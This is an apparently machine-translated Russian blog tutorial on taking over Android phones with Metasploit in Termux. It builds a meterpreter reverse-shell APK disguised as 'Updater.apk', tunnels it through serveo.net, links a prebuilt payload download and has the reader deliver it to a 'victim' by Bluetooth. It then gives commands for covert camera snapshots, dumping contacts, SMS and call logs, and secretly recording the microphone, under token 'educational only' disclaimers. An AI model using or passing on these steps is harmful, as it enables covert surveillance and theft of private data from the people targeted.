Найти в Дзене
Коля Лавер

Как стать хакером при помощи андроид? TermuX

Привет

Хочу немного поиграть в стиле WATCH_DOGS H4cK1nG ... !!! тогда вы в нужном месте!

Вы можете назвать это как: "Android для Android Hacking". Этот метод работает на 100%, поэтому внимательно следуйте моему уроку, его действительно очень легко следовать (но немного сложно). Если у вас есть какие-либо ошибки или вы думаете, что я что-то упустил, сообщите мне в разделе «Комментарии» Я постараюсь лучше всего решить проблему.

ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ: Эта тема является O.N.L.Y для целей образования. Я не буду нести ответственность за любое негативное и незаконное использование этой информации. Старайтесь не взламывать Android, кроме ваших. Или вы будете в тюрьме. Используйте эту информацию только в целях тестирования или для впечатления ваших друзей.

Итак, начнем ...

Требования

1). Android 5.0 (или позже. Учебник для более старых версий будет опубликован в ближайшее время ...)

2). Android-приложение TermuX (загрузить из магазина Play)

3). Установленная Metasploit Framework в TermuX (учебное пособие здесь)

4). Активное интернет / WiFi соединение

5). TermuX должно быть разрешено использовать внешнее хранилище (для этого введите только эту команду сразу: "termux-setup-storage")

6). MiXplorer (для подписания APK-файла загрузите его с сайта UpToDown)

7). MiX Signer (APK Signer для MiXplorer, скачать его из магазина Play)

8). (Рекомендуется) Используйте Hacker`s Keyboard для простого ввода команд в TermuX.

Шаг 1Пересылка портов

Многие люди используют NGROK для переадресации портов. Но в NGROK вы можете увидеть, что он создаст новый домен или порт при повторном подключении к нему. Зарезервированный домен и порт, к сожалению, доступны только для платных или их премиум-клиентов. Вот почему для NGROK вы должны генерировать новый APK-файл каждый раз, когда начинаете взламывать.

НО ЗДЕСЬ ... мы будем использовать Serveo. В Serveo вы можете вручную переадресовать желаемый порт в Интернете (и можете пересылать его снова в будущем). Чтобы использовать переадресацию портов Serveo, вы должны установить пакет OpenSSH для TermuX. Для этого введите эту команду в TermuX:

pkg установить openssh

- Он успешно установит OpenSSH

После установки просто введите это:

ssh -R (Desired_Port): localhost: (Desired_Port) serveo.net

- Подробности ниже

Он может спросить вас о ssh по умолчанию или что-то вроде этого. Просто введите «да», когда он спросит об этом.

Здесь вы должны помнить некоторые моменты; Если вы хотите перенаправить порт HTTP, затем выберите разные порты в обоих полях «Desired_Port». Но здесь мы будем перенаправлять порт TCP. Для пересылки TCP-порта вы должны ввести те же, желаемые порты в поле «Desired_Ports». Также не меняйте "localhost". Здесь мы собираемся переслать порт TCP: 4564 (только для примера). После переадресации порт может выглядеть так:

-2

(Необязательно) Назовите этот сеанс: Переадресация портов

Шаг 2 Создание APK-файла со встроенной полезной нагрузкой

Чтобы создать APK-файл со встроенной полезной нагрузкой, введите эту команду в NEW SESSION:

msfvenom -p android / meterpreter / reverse_tcp LHOST = serveo.net LPORT = 4564 R

> Хранение / Загрузки / Updater.apk

- Ссылка на Updater.apk находится в следующем третьем абзаце

Подождите минуту ...

Хорошо ... Теперь файл APK с встроенной полезной нагрузкой успешно генерируется здесь: Хранение телефона / SD-карты -> Загрузки -> Updater.apk

(ДОПОЛНИТЕЛЬНО) Вы можете использовать APK Editor Pro, чтобы изменить имя (по умолчанию: MainActivity) и версию созданного APK-файла.

Примечание: - Если вы не можете создать APK-файл, скачайте его отсюда:

mega.nz/#!uo9wSQRA!7_TqR8JqY_NJWZADNNZYEiBL1Imh1PvSrtK216m6uBc

(Помните: этот APK-файл не подписан! Вы должны подписать его перед использованием, чтобы избежать проблем).

Шаг 3: Подписание недавно сгенерированного файла APK

Чтобы подписать недавно созданный файл APK,

Откройте диспетчер файлов MiXplorer и перейдите к «Un-Signed APK File (Updater.apk)» (будет находиться в папке загрузок).

Длительное нажатие на «Un-Signed APK File (Updater.apk)» и выберите «кнопку МЕНЮ» в верхнем правом углу MiXplorer, затем выберите «SIGN».

Он будет отображать различные варианты подписи APK-файла (но предпочтительнее «AUTO»).

Выберите «АВТО», чтобы автоматически и успешно подписать файл APK.

Теперь ваш APK-файл: (имя файла) -signed.apk успешно подписан и полностью функционален и имеет размер 9,9 КБ.

Для получения дополнительной информации о подписании apk-файла посетите мой учебник: Подпишите APK-файл с помощью встроенной полезной нагрузки (The Ultimate Guide)

Шаг 4 Настройка Metasploit в TermuX

Активируйте Metasploit Framework в TermuX, введя эту команду в новом сеансе:

msfconsole

- Metasploit Framework Console

Примечание (1): - Если вы еще не установили Metasploit-Framework в своем приложении TermuX, следуйте этому руководству: Установите Metasploit Framework в TermuX на Android

Примечание (2): - Если вы получаете эту ошибку: Не удалось подключиться к базе данных, как показано на снимке экрана ниже, введите следующие команды в НОВУЮ СЕССИЮ (К сожалению, вам может понадобиться вводить эти команды каждый раз, когда вы открываете TermuX (в отдельная сессия). Но, к счастью, ввод таких (следующих) команд не повлияет на ваш взлом! Вот почему я игнорирую эту ошибку :)

mkdir -p $ PREFIX / var / lib / postgresql

initdb $ PREFIX / var / lib / postgresql

pg_ctl -D $ PREFIX / var / lib / postgresql start

- Спасибо DUST WORLD, за это исправление ... !!!

Подождите минутку ...

Теперь, когда msfconsole запускается, наберите следующие (полужирные) команды одну за другой внимательно:

msf> использовать эксплойт / multi / handler

msf> установить полезную нагрузку android / meterpreter / reverse_tcp

msf> установить LHOST localhost

msf> установить LPORT 4564

msf> эксплуатировать -j -z

- вводите только жирные команды

Шаг 5. Установка APK в Android-устройстве жертвы.

Теперь отправьте файл Payload-Signed.apk на устройство Android вашей жертвы (например, рекомендуется через Bluetooth) -> Установите его -> затем откройте его (убедитесь, что устройство жертвы имеет активное подключение к Интернету).

После открытия APK-файла на телефоне жертвы вы увидите, что Meterpreter Session в вашем поле Metasploit будет активирован. Чтобы открыть сеанс Meterpreter на устройстве жертвы, нажмите «Кнопка возврата» и введите эту команду в сеансе Metasploit:

сеансы -i (идентификатор сессии)

- (ID сеанса) = 1, 2, 3, 4 или 5 ...

В (ID сеанса) выберите номер сеанса Meterpreter (т.е. вы увидите это сообщение, когда ваша жертва откроет файл APK: Meterpreter Session Opened 1, здесь 1 - идентификатор сеанса Meterpreter Session).

Если вы видите следующее окно, то

БИНГО.......!!!!!!!! Вы успешно взломали Android-устройство жертвы

!!! ... нужна помощь во время взлома ... ???

Вы можете ввести: команду {meterpreter> help}, для всех доступных команд, здесь я упростил некоторые команды для вас.

Принимая Стелс Снимок с передней камеры

Просто введите эту команду для этого:

webcam_snap -i 2 -p хранилище / загрузки / X-Stealth-Snapshot-F.jpg

Здесь в этой команде 2 представляет фронтальную камеру. Для задней камеры мы будем использовать 1.

Ваш Stealth Snapshot можно найти здесь: (хранилище записи по умолчанию) -> загрузки -> X-Stealth-Snapshot-F.jpg

Снимок Stealth с задней камеры

Как и выше, но на этот раз мы будем использовать 1,

webcam_snap -i 1 -p хранилище / загрузки / X-Stealth-Snapshot-R.jpg

Ваш Stealth Snapshot можно найти здесь: (хранилище записи по умолчанию) -> загрузки -> X-Stealth-Snapshot-R.jpg

Получение всех контактов

Чтобы получить контакты, просто введите эту команду:

dump_contacts -o хранилище / загрузки / X-Contacts.txt

Conacts будут сохранены в: (хранилище записи по умолчанию) -> загрузки -> X-Contacts.txt

Загрузка всех SMS

Как и выше,

dump_sms -o хранилище / загрузки / X-SMS.txt

Все SMS будут сохранены в: (хранилище записи по умолчанию) -> загрузки -> X-SMS.txt

Получение журнала вызовов

Просто введите это:

dump_calllog -o хранилище / загрузки / X-CallLog.txt

Журнал вызовов будет сохранен в: (хранилище записи по умолчанию) -> загрузки -> X-CallLog.txt

Подглядывание через микрофон

Здесь вы должны отредактировать длительность записи микрофона (по умолчанию: 1 с). Команда на 10 секунд записи выглядит так:

record_mic -d 10 -f хранилище / загрузки / X-Spy-Record.mp3

Шпионская запись будет сохранена в: (хранилище записи по умолчанию) -> загрузки -> X-Spy-Record.mp3

??? ... Общие проблемы ... ???

Metasploit не работает на TermuX

Это может произойти, если вы делаете что-то не так при установке TermuX на Android. Если вы видите ошибку, такую ​​как GEMS, не найдена, или любую другую ошибку такого рода, просто удалите TermuX с его данными и переустановите.

msfvenom / msfconsole: команда не найдена!

Есть две возможные причины этой ошибки.

1). Metasploit неправильно установлен на TermuX. Поэтому не удалось создать командный ярлык. Чтобы это исправить, удалите TermuX с данными. Затем переустановите TermuX и повторите все методы снова. Это на самом деле ошибка скрипта. Я также столкнулся с этой проблемой при первой установке Metasploit в TermuX!

2). Metasploit успешно установлен, но не смог создать ярлык. Для этого просто введите:

Ручной путь

Просто откройте новый сеанс и перейдите в каталог metasploit-framework, и введите команду ./msfconsole, Like This (то же самое для msfvenom):

cd metasploit-framework

./msfconsole

ИЛИ ЖЕ

./msfvenom

- 1-я команда займет U 2 в каталоге MSF, а 2-я - 2 в начале MSF.

2). Ярлык метод

Те люди, которые не удовлетворены первым и хотят создать команду быстрого доступа, как и другие программы, вводят следующие команды по одному в новом сеансе (включая msfvenom):

ln -s /data/data/com.termux/files/home/metasploit-framework/msfconsole

mv msfconsole $ PREFIX / bin

ln -s /data/data/com.termux/files/home/metasploit-framework/msfvenom

mv msfvenom $ PREFIX / bin

- Этот процесс также называется Symlinking [Обновлено]

3). Еще не повезло (с мсфвеном) !? Я загрузил Updater.apk с настройками по умолчанию (LHOST = serveo.net, LPORT = 4564). Загрузите это оттуда.

Почему мы используем serveo.net ...?

Как я уже говорил, NGROK не поддерживает фиксированный домен и порт. Итак, вы должны сгенерировать новый файл APK, когда вы планируете взломать телефон, вы взломали раньше. Посмотрите, что сервео говорит о NGROK:

Почему мы используем MiXplorer для подписания файла APK ...?

На самом деле, нет другого способа подписать APK-файл на Android. В противном случае, вы должны подписать файл APP на вашем компьютере (особенно в Kali LinuX).

MiXplorer - это отличный способ подписать APK-файл прямо в Android.

Ошибка Metasploit: не удалось подключиться к базе данных

Не беспокойся об этом. Мы уже сделали решение для этого :). Я думаю, что вы заметили ранее, что я использовал "localhost" вместо 127.0.0.1 или ::: 0: 1 в качестве HOST. На самом деле, команда «localhost» автоматически соединяет вас с доступным локальным хостом, независимо от того, является ли он 127.0.0.1 или ::: 0.1 или другим.

Но если вы все еще хотите это исправить, введите в New Session of TermuX следующие команды:

mkdir -p $ PREFIX / var / lib / postgresql

initdb $ PREFIX / var / lib / postgresql

pg_ctl -D $ PREFIX / var / lib / postgresql start

- Спасибо Dusty World за этот FIX

Какой телефон Android лучше всего подходит для целей H4ck1nG ...?

1). Телефоны / планшеты Google NeXuS отлично подходят для целей Hack1nG. Так как они полностью поддерживают Kali NetHunter. NetHunter включает в себя все инструменты для взлома и работает как Android / Windows на планшете.

2). Но если говорить об Android, многие H4ck3R говорят, что Samsung Galaxy S5 отлично подходит для целей Ha4ck1nG. Он имеет хорошую версию Android (около 5.0), а также полностью поддерживает приложение TermuX.

Заметка:-

Эта информация только для образовательных целей. Я не буду нести ответственность за негативное или незаконное использование этой информации. Кроме того, если вы столкнулись с какими-либо ошибками или считаете, что я что-то упустил, сообщите мне об этом в разделе комментариев. Я найду подходящее решение для этого. В любом случае, просто используйте эти трюки для удовольствия ... Не для выполнения незаконной работы. Мы все этические H4ck3Rs, и никогда не вторгаемся в тайны людей.